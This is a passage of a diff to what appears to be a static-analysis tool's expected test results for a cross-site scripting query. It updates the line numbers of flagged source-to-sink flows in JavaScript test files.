' | Cross-site scripting vulnerability due to $@. | event-handler-receiver.js:2:49:2:61 | location.href | user-provided value | -| express.js:7:15:7:33 | req.param("wobble") | express.js:7:15:7:33 | req.param("wobble") | express.js:7:15:7:33 | req.param("wobble") | Cross-site scripting vulnerability due to $@. | express.js:7:15:7:33 | req.param("wobble") | user-provided value | +| express.js:6:15:6:33 | req.param("wobble") | express.js:6:15:6:33 | req.param("wobble") | express.js:6:15:6:33 | req.param("wobble") | Cross-site scripting vulnerability due to $@. | express.js:6:15:6:33 | req.param("wobble") | user-provided value | | jquery.js:7:5:7:34 | "
" | jquery.js:2:17:2:40 | documen ... .search | jquery.js:7:5:7:34 | "
" | Cross-site scripting vulnerability due to $@. | jquery.js:2:17:2:40 | documen ... .search | user-provided value | | jquery.js:8:18:8:34 | "XSS: " + tainted | jquery.js:2:17:2:40 | documen ... .search | jquery.js:8:18:8:34 | "XSS: " + tainted | Cross-site scripting vulnerability due to $@. | jquery.js:2:17:2:40 | documen ... .search | user-provided value | | jquery.js:10:5:10:40 | "" + ... "" | jquery.js:10:13:10:20 | location | jquery.js:10:5:10:40 | "" + ... "" | Cross-site scripting vulnerability due to $@. | jquery.js:10:13:10:20 | location | user-provided value | 
@@ -1307,7 +1307,7 @@ subpaths | jquery.js:37:25:37:37 | () => tainted | jquery.js:2:17:2:40 | documen ... .search | jquery.js:37:25:37:37 | () => tainted | Cross-site scripting vulnerability due to $@. | jquery.js:2:17:2:40 | documen ... .search | user-provided value | | json-stringify.jsx:31:40:31:61 | JSON.st ... locale) | json-stringify.jsx:5:18:5:36 | req.param("locale") | json-stringify.jsx:31:40:31:61 | JSON.st ... locale) | Cross-site scripting vulnerability due to $@. | json-stringify.jsx:5:18:5:36 | req.param("locale") | user-provided value | | json-stringify.jsx:35:40:35:61 | JSON.st ... jsonLD) | json-stringify.jsx:5:18:5:36 | req.param("locale") | json-stringify.jsx:35:40:35:61 | JSON.st ... jsonLD) | Cross-site scripting vulnerability due to $@. | json-stringify.jsx:5:18:5:36 | req.param("locale") | user-provided value | -| jwt-server.js:11:19:11:29 | decoded.foo | jwt-server.js:7:17:7:35 | req.param("wobble") | jwt-server.js:11:19:11:29 | decoded.foo | Cross-site scripting vulnerability due to $@. | jwt-server.js:7:17:7:35 | req.param("wobble") | user-provided value | +| jwt-server.js:10:19:10:29 | decoded.foo | jwt-server.js:7:17:7:35 | req.param("wobble") | jwt-server.js:10:19:10:29 | decoded.foo | Cross-site scripting vulnerability due to $@. | jwt-server.js:7:17:7:35 | req.param("wobble") | user-provided value | | nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | nodemailer.js:13:50:13:66 | req.query.message | nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | HTML injection vulnerability due to $@. | nodemailer.js:13:50:13:66 | req.query.message | user-provided value | | optionalSanitizer.js:6:18:6:23 | target | optionalSanitizer.js:2:16:2:39 | documen ... .search | optionalSanitizer.js:6:18:6:23 | target | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:2:16:2:39 | documen ... .search | user-provided value | | optionalSanitizer.js:9:18:9:24 | tainted | optionalSanitizer.js:2:16:2:39 | documen ... 
.search | optionalSanitizer.js:9:18:9:24 | tainted | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:2:16:2:39 | documen ... .search | user-provided value | 
@@ -1353,7 +1353,7 @@ subpaths | tooltip.jsx:10:25:10:30 | source | tooltip.jsx:6:20:6:30 | window.name | tooltip.jsx:10:25:10:30 | source | Cross-site scripting vulnerability due to $@. | tooltip.jsx:6:20:6:30 | window.name | user-provided value | | tooltip.jsx:11:25:11:30 | source | tooltip.jsx:6:20:6:30 | window.name | tooltip.jsx:11:25:11:30 | source | Cross-site scripting vulnerability due to $@. | tooltip.jsx:6:20:6:30 | window.name | user-provided value | | tooltip.jsx:18:51:18:59 | provide() | tooltip.jsx:22:20:22:30 | window.name | tooltip.jsx:18:51:18:59 | provide() | Cross-site scripting vulnerability due to $@. | tooltip.jsx:22:20:22:30 | window.name | user-provided value | -| translate.js:9:27:9:50 | searchP ... 'term') | translate.js:6:16:6:39 | documen ... .search | translate.js:9:27:9:50 | searchP ... 'term') | Cross-site scripting vulnerability due to $@. | translate.js:6:16:6:39 | documen ... .search | user-provided value | +| translate.js:8:27:8:50 | searchP ... 'term') | translate.js:6:16:6:39 | documen ... .search | translate.js:8:27:8:50 | searchP ... 'term') | Cross-site scripting vulnerability due to $@. | translate.js:6:16:6:39 | documen ... .search | user-provided value | | trusted-types-lib.js:2:12:2:12 | x | trusted-types.js:13:20:13:30 | window.name | trusted-types-lib.js:2:12:2:12 | x | Cross-site scripting vulnerability due to $@. | trusted-types.js:13:20:13:30 | window.name | user-provided value | | trusted-types.js:3:67:3:67 | x | trusted-types.js:4:20:4:30 | window.name | trusted-types.js:3:67:3:67 | x | Cross-site scripting vulnerability due to $@. | trusted-types.js:4:20:4:30 | window.name | user-provided value | | tst3.js:4:25:4:32 | data.src | tst3.js:2:42:2:63 | window. ... .search | tst3.js:4:25:4:32 | data.src | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | 
@@ -1361,97 +1361,97 @@ subpaths | tst3.js:7:32:7:37 | data.p | tst3.js:2:42:2:63 | window. ... .search | tst3.js:7:32:7:37 | data.p | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | | tst3.js:9:37:9:42 | data.p | tst3.js:2:42:2:63 | window. ... .search | tst3.js:9:37:9:42 | data.p | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | | tst3.js:10:38:10:43 | data.p | tst3.js:2:42:2:63 | window. ... .search | tst3.js:10:38:10:43 | data.p | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | -| tst.js:5:18:5:23 | target | tst.js:2:16:2:39 | documen ... .search | tst.js:5:18:5:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | -| tst.js:8:18:8:126 | "" | tst.js:8:37:8:58 | documen ... on.href | tst.js:8:18:8:126 | "" | Cross-site scripting vulnerability due to $@. | tst.js:8:37:8:58 | documen ... on.href | user-provided value | -| tst.js:12:5:12:42 | '
' | tst.js:2:16:2:39 | documen ... .search | tst.js:12:5:12:42 | '
' | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | -| tst.js:18:18:18:35 | params.get('name') | tst.js:17:25:17:41 | document.location | tst.js:18:18:18:35 | params.get('name') | Cross-site scripting vulnerability due to $@. | tst.js:17:25:17:41 | document.location | user-provided value | -| tst.js:21:18:21:41 | searchP ... 'name') | tst.js:2:16:2:39 | documen ... .search | tst.js:21:18:21:41 | searchP ... 'name') | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | -| tst.js:26:18:26:23 | target | tst.js:28:5:28:28 | documen ... .search | tst.js:26:18:26:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:28:5:28:28 | documen ... .search | user-provided value | -| tst.js:34:16:34:20 | bar() | tst.js:31:10:31:33 | documen ... .search | tst.js:34:16:34:20 | bar() | Cross-site scripting vulnerability due to $@. | tst.js:31:10:31:33 | documen ... .search | user-provided value | -| tst.js:40:16:40:44 | baz(doc ... search) | tst.js:40:20:40:43 | documen ... .search | tst.js:40:16:40:44 | baz(doc ... search) | Cross-site scripting vulnerability due to $@. | tst.js:40:20:40:43 | documen ... .search | user-provided value | -| tst.js:46:16:46:45 | wrap(do ... search) | tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | wrap(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:46:21:46:44 | documen ... .search | user-provided value | -| tst.js:54:16:54:45 | chop(do ... search) | tst.js:54:21:54:44 | documen ... .search | tst.js:54:16:54:45 | chop(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:54:21:54:44 | documen ... .search | user-provided value | -| tst.js:56:16:56:45 | chop(do ... search) | tst.js:56:21:56:44 | documen ... .search | tst.js:56:16:56:45 | chop(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:56:21:56:44 | documen ... 
.search | user-provided value | -| tst.js:58:16:58:32 | wrap(chop(bar())) | tst.js:31:10:31:33 | documen ... .search | tst.js:58:16:58:32 | wrap(chop(bar())) | Cross-site scripting vulnerability due to $@. | tst.js:31:10:31:33 | documen ... .search | user-provided value | -| tst.js:62:18:62:18 | s | tst.js:64:25:64:48 | documen ... .search | tst.js:62:18:62:18 | s | Cross-site scripting vulnerability due to $@. | tst.js:64:25:64:48 | documen ... .search | user-provided value | -| tst.js:62:18:62:18 | s | tst.js:65:25:65:48 | documen ... .search | tst.js:62:18:62:18 | s | Cross-site scripting vulnerability due to $@. | tst.js:65:25:65:48 | documen ... .search | user-provided value | -| tst.js:68:16:68:20 | bar() | tst.js:31:10:31:33 | documen ... .search | tst.js:68:16:68:20 | bar() | Cross-site scripting vulnerability due to $@. | tst.js:31:10:31:33 | documen ... .search | user-provided value | -| tst.js:73:20:73:20 | x | tst.js:70:3:70:26 | documen ... .search | tst.js:73:20:73:20 | x | Cross-site scripting vulnerability due to $@. | tst.js:70:3:70:26 | documen ... .search | user-provided value | -| tst.js:77:49:77:72 | documen ... .search | tst.js:77:49:77:72 | documen ... .search | tst.js:77:49:77:72 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:77:49:77:72 | documen ... .search | user-provided value | -| tst.js:81:26:81:49 | documen ... .search | tst.js:81:26:81:49 | documen ... .search | tst.js:81:26:81:49 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:81:26:81:49 | documen ... .search | user-provided value | -| tst.js:82:25:82:48 | documen ... .search | tst.js:82:25:82:48 | documen ... .search | tst.js:82:25:82:48 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:82:25:82:48 | documen ... .search | user-provided value | -| tst.js:84:33:84:56 | documen ... .search | tst.js:84:33:84:56 | documen ... .search | tst.js:84:33:84:56 | documen ... 
.search | Cross-site scripting vulnerability due to $@. | tst.js:84:33:84:56 | documen ... .search | user-provided value | -| tst.js:85:32:85:55 | documen ... .search | tst.js:85:32:85:55 | documen ... .search | tst.js:85:32:85:55 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:85:32:85:55 | documen ... .search | user-provided value | -| tst.js:90:39:90:62 | documen ... .search | tst.js:90:39:90:62 | documen ... .search | tst.js:90:39:90:62 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:90:39:90:62 | documen ... .search | user-provided value | -| tst.js:96:30:96:53 | documen ... .search | tst.js:96:30:96:53 | documen ... .search | tst.js:96:30:96:53 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:96:30:96:53 | documen ... .search | user-provided value | -| tst.js:102:25:102:48 | documen ... .search | tst.js:102:25:102:48 | documen ... .search | tst.js:102:25:102:48 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:102:25:102:48 | documen ... .search | user-provided value | -| tst.js:110:18:110:18 | v | tst.js:107:11:107:34 | documen ... .search | tst.js:110:18:110:18 | v | Cross-site scripting vulnerability due to $@. | tst.js:107:11:107:34 | documen ... .search | user-provided value | -| tst.js:136:18:136:18 | v | tst.js:107:11:107:34 | documen ... .search | tst.js:136:18:136:18 | v | Cross-site scripting vulnerability due to $@. | tst.js:107:11:107:34 | documen ... .search | user-provided value | -| tst.js:151:49:151:49 | v | tst.js:148:29:148:50 | window. ... .search | tst.js:151:49:151:49 | v | Cross-site scripting vulnerability due to $@. | tst.js:148:29:148:50 | window. ... .search | user-provided value | -| tst.js:155:29:155:46 | xssSourceService() | tst.js:158:40:158:61 | window. ... .search | tst.js:155:29:155:46 | xssSourceService() | Cross-site scripting vulnerability due to $@. | tst.js:158:40:158:61 | window. ... 
.search | user-provided value | -| tst.js:180:28:180:33 | target | tst.js:177:18:177:41 | documen ... .search | tst.js:180:28:180:33 | target | Cross-site scripting vulnerability due to $@. | tst.js:177:18:177:41 | documen ... .search | user-provided value | -| tst.js:186:31:186:37 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:186:31:186:37 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:188:42:188:48 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:188:42:188:48 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:189:33:189:39 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:189:33:189:39 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:191:54:191:60 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:191:54:191:60 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:192:45:192:51 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:192:45:192:51 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:193:49:193:55 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:193:49:193:55 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:199:67:199:73 | tainted | tst.js:197:19:197:42 | documen ... .search | tst.js:199:67:199:73 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:200:67:200:73 | tainted | tst.js:197:19:197:42 | documen ... 
.search | tst.js:200:67:200:73 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:212:28:212:46 | this.state.tainted1 | tst.js:197:19:197:42 | documen ... .search | tst.js:212:28:212:46 | this.state.tainted1 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:213:28:213:46 | this.state.tainted2 | tst.js:197:19:197:42 | documen ... .search | tst.js:213:28:213:46 | this.state.tainted2 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:214:28:214:46 | this.state.tainted3 | tst.js:197:19:197:42 | documen ... .search | tst.js:214:28:214:46 | this.state.tainted3 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:218:32:218:49 | prevState.tainted4 | tst.js:197:19:197:42 | documen ... .search | tst.js:218:32:218:49 | prevState.tainted4 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:225:28:225:46 | this.props.tainted1 | tst.js:197:19:197:42 | documen ... .search | tst.js:225:28:225:46 | this.props.tainted1 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:226:28:226:46 | this.props.tainted2 | tst.js:197:19:197:42 | documen ... .search | tst.js:226:28:226:46 | this.props.tainted2 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:227:28:227:46 | this.props.tainted3 | tst.js:197:19:197:42 | documen ... .search | tst.js:227:28:227:46 | this.props.tainted3 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... 
.search | user-provided value | -| tst.js:231:32:231:49 | prevProps.tainted4 | tst.js:197:19:197:42 | documen ... .search | tst.js:231:32:231:49 | prevProps.tainted4 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:251:60:251:82 | this.st ... Tainted | tst.js:197:19:197:42 | documen ... .search | tst.js:251:60:251:82 | this.st ... Tainted | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:259:7:259:17 | window.name | tst.js:259:7:259:17 | window.name | tst.js:259:7:259:17 | window.name | Cross-site scripting vulnerability due to $@. | tst.js:259:7:259:17 | window.name | user-provided value | -| tst.js:260:7:260:10 | name | tst.js:260:7:260:10 | name | tst.js:260:7:260:10 | name | Cross-site scripting vulnerability due to $@. | tst.js:260:7:260:10 | name | user-provided value | -| tst.js:264:11:264:21 | window.name | tst.js:264:11:264:21 | window.name | tst.js:264:11:264:21 | window.name | Cross-site scripting vulnerability due to $@. | tst.js:264:11:264:21 | window.name | user-provided value | -| tst.js:280:22:280:29 | location | tst.js:280:22:280:29 | location | tst.js:280:22:280:29 | location | Cross-site scripting vulnerability due to $@. | tst.js:280:22:280:29 | location | user-provided value | -| tst.js:288:59:288:65 | tainted | tst.js:285:19:285:29 | window.name | tst.js:288:59:288:65 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:285:19:285:29 | window.name | user-provided value | -| tst.js:303:20:303:20 | e | tst.js:301:9:301:16 | location | tst.js:303:20:303:20 | e | Cross-site scripting vulnerability due to $@. | tst.js:301:9:301:16 | location | user-provided value | -| tst.js:311:20:311:20 | e | tst.js:308:10:308:17 | location | tst.js:311:20:311:20 | e | Cross-site scripting vulnerability due to $@. 
| tst.js:308:10:308:17 | location | user-provided value | -| tst.js:316:35:316:42 | location | tst.js:316:35:316:42 | location | tst.js:316:35:316:42 | location | Cross-site scripting vulnerability due to $@. | tst.js:316:35:316:42 | location | user-provided value | -| tst.js:332:18:332:35 | params.get('name') | tst.js:327:18:327:34 | document.location | tst.js:332:18:332:35 | params.get('name') | Cross-site scripting vulnerability due to $@. | tst.js:327:18:327:34 | document.location | user-provided value | -| tst.js:343:5:343:30 | getUrl( ... ring(1) | tst.js:341:20:341:36 | document.location | tst.js:343:5:343:30 | getUrl( ... ring(1) | Cross-site scripting vulnerability due to $@. | tst.js:341:20:341:36 | document.location | user-provided value | -| tst.js:349:12:349:17 | target | tst.js:348:16:348:39 | documen ... .search | tst.js:349:12:349:17 | target | Cross-site scripting vulnerability due to $@. | tst.js:348:16:348:39 | documen ... .search | user-provided value | -| tst.js:356:16:356:21 | target | tst.js:355:19:355:42 | documen ... .search | tst.js:356:16:356:21 | target | Cross-site scripting vulnerability due to $@. | tst.js:355:19:355:42 | documen ... .search | user-provided value | -| tst.js:360:21:360:26 | target | tst.js:355:19:355:42 | documen ... .search | tst.js:360:21:360:26 | target | Cross-site scripting vulnerability due to $@. | tst.js:355:19:355:42 | documen ... .search | user-provided value | -| tst.js:363:18:363:23 | target | tst.js:355:19:355:42 | documen ... .search | tst.js:363:18:363:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:355:19:355:42 | documen ... .search | user-provided value | -| tst.js:374:18:374:23 | target | tst.js:371:16:371:39 | documen ... .search | tst.js:374:18:374:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:371:16:371:39 | documen ... .search | user-provided value | -| tst.js:384:18:384:23 | target | tst.js:381:16:381:39 | documen ... 
.search | tst.js:384:18:384:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:381:16:381:39 | documen ... .search | user-provided value | -| tst.js:386:18:386:29 | target.taint | tst.js:381:16:381:39 | documen ... .search | tst.js:386:18:386:29 | target.taint | Cross-site scripting vulnerability due to $@. | tst.js:381:16:381:39 | documen ... .search | user-provided value | -| tst.js:392:18:392:30 | target.taint3 | tst.js:391:19:391:42 | documen ... .search | tst.js:392:18:392:30 | target.taint3 | Cross-site scripting vulnerability due to $@. | tst.js:391:19:391:42 | documen ... .search | user-provided value | -| tst.js:397:18:397:30 | target.taint5 | tst.js:381:16:381:39 | documen ... .search | tst.js:397:18:397:30 | target.taint5 | Cross-site scripting vulnerability due to $@. | tst.js:381:16:381:39 | documen ... .search | user-provided value | -| tst.js:406:18:406:30 | target.taint7 | tst.js:381:16:381:39 | documen ... .search | tst.js:406:18:406:30 | target.taint7 | Cross-site scripting vulnerability due to $@. | tst.js:381:16:381:39 | documen ... .search | user-provided value | -| tst.js:409:18:409:30 | target.taint8 | tst.js:381:16:381:39 | documen ... .search | tst.js:409:18:409:30 | target.taint8 | Cross-site scripting vulnerability due to $@. | tst.js:381:16:381:39 | documen ... .search | user-provided value | -| tst.js:417:18:417:24 | payload | tst.js:416:17:416:36 | window.location.hash | tst.js:417:18:417:24 | payload | Cross-site scripting vulnerability due to $@. | tst.js:416:17:416:36 | window.location.hash | user-provided value | -| tst.js:421:20:421:27 | match[1] | tst.js:419:15:419:34 | window.location.hash | tst.js:421:20:421:27 | match[1] | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:34 | window.location.hash | user-provided value | -| tst.js:424:18:424:51 | window. ... '#')[1] | tst.js:424:18:424:37 | window.location.hash | tst.js:424:18:424:51 | window. ... 
'#')[1] | Cross-site scripting vulnerability due to $@. | tst.js:424:18:424:37 | window.location.hash | user-provided value | -| tst.js:430:18:430:89 | target. ... data>') | tst.js:428:16:428:39 | documen ... .search | tst.js:430:18:430:89 | target. ... data>') | Cross-site scripting vulnerability due to $@. | tst.js:428:16:428:39 | documen ... .search | user-provided value | -| tst.js:440:28:440:33 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:440:28:440:33 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:441:33:441:38 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:441:33:441:38 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:442:34:442:39 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:442:34:442:39 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:443:41:443:46 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:443:41:443:46 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:444:44:444:49 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:444:44:444:49 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:445:32:445:37 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:445:32:445:37 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:455:18:455:23 | source | tst.js:453:16:453:39 | documen ... .search | tst.js:455:18:455:23 | source | Cross-site scripting vulnerability due to $@. | tst.js:453:16:453:39 | documen ... 
.search | user-provided value | -| tst.js:456:18:456:42 | ansiToH ... source) | tst.js:453:16:453:39 | documen ... .search | tst.js:456:18:456:42 | ansiToH ... source) | Cross-site scripting vulnerability due to $@. | tst.js:453:16:453:39 | documen ... .search | user-provided value | -| tst.js:463:21:463:26 | source | tst.js:460:15:460:38 | documen ... .search | tst.js:463:21:463:26 | source | Cross-site scripting vulnerability due to $@. | tst.js:460:15:460:38 | documen ... .search | user-provided value | -| tst.js:465:19:465:24 | source | tst.js:460:15:460:38 | documen ... .search | tst.js:465:19:465:24 | source | Cross-site scripting vulnerability due to $@. | tst.js:460:15:460:38 | documen ... .search | user-provided value | -| tst.js:467:20:467:25 | source | tst.js:460:15:460:38 | documen ... .search | tst.js:467:20:467:25 | source | Cross-site scripting vulnerability due to $@. | tst.js:460:15:460:38 | documen ... .search | user-provided value | -| tst.js:473:19:473:21 | url | tst.js:471:13:471:36 | documen ... .search | tst.js:473:19:473:21 | url | Cross-site scripting vulnerability due to $@. | tst.js:471:13:471:36 | documen ... .search | user-provided value | -| tst.js:474:26:474:28 | url | tst.js:471:13:471:36 | documen ... .search | tst.js:474:26:474:28 | url | Cross-site scripting vulnerability due to $@. | tst.js:471:13:471:36 | documen ... .search | user-provided value | -| tst.js:475:25:475:27 | url | tst.js:471:13:471:36 | documen ... .search | tst.js:475:25:475:27 | url | Cross-site scripting vulnerability due to $@. | tst.js:471:13:471:36 | documen ... .search | user-provided value | -| tst.js:476:20:476:22 | url | tst.js:471:13:471:36 | documen ... .search | tst.js:476:20:476:22 | url | Cross-site scripting vulnerability due to $@. | tst.js:471:13:471:36 | documen ... .search | user-provided value | -| tst.js:486:22:486:24 | url | tst.js:471:13:471:36 | documen ... 
.search | tst.js:486:22:486:24 | url | Cross-site scripting vulnerability due to $@. | tst.js:471:13:471:36 | documen ... .search | user-provided value | -| tst.js:491:23:491:45 | locatio ... bstr(1) | tst.js:491:23:491:35 | location.hash | tst.js:491:23:491:45 | locatio ... bstr(1) | Cross-site scripting vulnerability due to $@. | tst.js:491:23:491:35 | location.hash | user-provided value | -| tst.js:494:18:494:40 | locatio ... bstr(1) | tst.js:494:18:494:30 | location.hash | tst.js:494:18:494:40 | locatio ... bstr(1) | Cross-site scripting vulnerability due to $@. | tst.js:494:18:494:30 | location.hash | user-provided value | -| tst.js:501:33:501:63 | decodeU ... n.hash) | tst.js:501:43:501:62 | window.location.hash | tst.js:501:33:501:63 | decodeU ... n.hash) | Cross-site scripting vulnerability due to $@. | tst.js:501:43:501:62 | window.location.hash | user-provided value | -| tst.js:509:18:509:54 | target. ... "), '') | tst.js:508:16:508:39 | documen ... .search | tst.js:509:18:509:54 | target. ... "), '') | Cross-site scripting vulnerability due to $@. | tst.js:508:16:508:39 | documen ... .search | user-provided value | +| tst.js:4:18:4:23 | target | tst.js:2:16:2:39 | documen ... .search | tst.js:4:18:4:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | +| tst.js:6:18:6:126 | "" | tst.js:6:37:6:58 | documen ... on.href | tst.js:6:18:6:126 | "" | Cross-site scripting vulnerability due to $@. | tst.js:6:37:6:58 | documen ... on.href | user-provided value | +| tst.js:9:5:9:42 | '
' | tst.js:2:16:2:39 | documen ... .search | tst.js:9:5:9:42 | '
' | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | +| tst.js:15:18:15:35 | params.get('name') | tst.js:14:25:14:41 | document.location | tst.js:15:18:15:35 | params.get('name') | Cross-site scripting vulnerability due to $@. | tst.js:14:25:14:41 | document.location | user-provided value | +| tst.js:18:18:18:41 | searchP ... 'name') | tst.js:2:16:2:39 | documen ... .search | tst.js:18:18:18:41 | searchP ... 'name') | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | +| tst.js:22:18:22:23 | target | tst.js:24:5:24:28 | documen ... .search | tst.js:22:18:22:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:24:5:24:28 | documen ... .search | user-provided value | +| tst.js:29:16:29:20 | bar() | tst.js:27:10:27:33 | documen ... .search | tst.js:29:16:29:20 | bar() | Cross-site scripting vulnerability due to $@. | tst.js:27:10:27:33 | documen ... .search | user-provided value | +| tst.js:34:16:34:44 | baz(doc ... search) | tst.js:34:20:34:43 | documen ... .search | tst.js:34:16:34:44 | baz(doc ... search) | Cross-site scripting vulnerability due to $@. | tst.js:34:20:34:43 | documen ... .search | user-provided value | +| tst.js:39:16:39:45 | wrap(do ... search) | tst.js:39:21:39:44 | documen ... .search | tst.js:39:16:39:45 | wrap(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:39:21:39:44 | documen ... .search | user-provided value | +| tst.js:46:16:46:45 | chop(do ... search) | tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | chop(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:46:21:46:44 | documen ... .search | user-provided value | +| tst.js:47:16:47:45 | chop(do ... search) | tst.js:47:21:47:44 | documen ... .search | tst.js:47:16:47:45 | chop(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:47:21:47:44 | documen ... 
.search | user-provided value | +| tst.js:48:16:48:32 | wrap(chop(bar())) | tst.js:27:10:27:33 | documen ... .search | tst.js:48:16:48:32 | wrap(chop(bar())) | Cross-site scripting vulnerability due to $@. | tst.js:27:10:27:33 | documen ... .search | user-provided value | +| tst.js:51:18:51:18 | s | tst.js:53:25:53:48 | documen ... .search | tst.js:51:18:51:18 | s | Cross-site scripting vulnerability due to $@. | tst.js:53:25:53:48 | documen ... .search | user-provided value | +| tst.js:51:18:51:18 | s | tst.js:54:25:54:48 | documen ... .search | tst.js:51:18:51:18 | s | Cross-site scripting vulnerability due to $@. | tst.js:54:25:54:48 | documen ... .search | user-provided value | +| tst.js:56:16:56:20 | bar() | tst.js:27:10:27:33 | documen ... .search | tst.js:56:16:56:20 | bar() | Cross-site scripting vulnerability due to $@. | tst.js:27:10:27:33 | documen ... .search | user-provided value | +| tst.js:60:20:60:20 | x | tst.js:58:3:58:26 | documen ... .search | tst.js:60:20:60:20 | x | Cross-site scripting vulnerability due to $@. | tst.js:58:3:58:26 | documen ... .search | user-provided value | +| tst.js:63:49:63:72 | documen ... .search | tst.js:63:49:63:72 | documen ... .search | tst.js:63:49:63:72 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:63:49:63:72 | documen ... .search | user-provided value | +| tst.js:67:26:67:49 | documen ... .search | tst.js:67:26:67:49 | documen ... .search | tst.js:67:26:67:49 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:67:26:67:49 | documen ... .search | user-provided value | +| tst.js:68:25:68:48 | documen ... .search | tst.js:68:25:68:48 | documen ... .search | tst.js:68:25:68:48 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:68:25:68:48 | documen ... .search | user-provided value | +| tst.js:70:33:70:56 | documen ... .search | tst.js:70:33:70:56 | documen ... .search | tst.js:70:33:70:56 | documen ... 
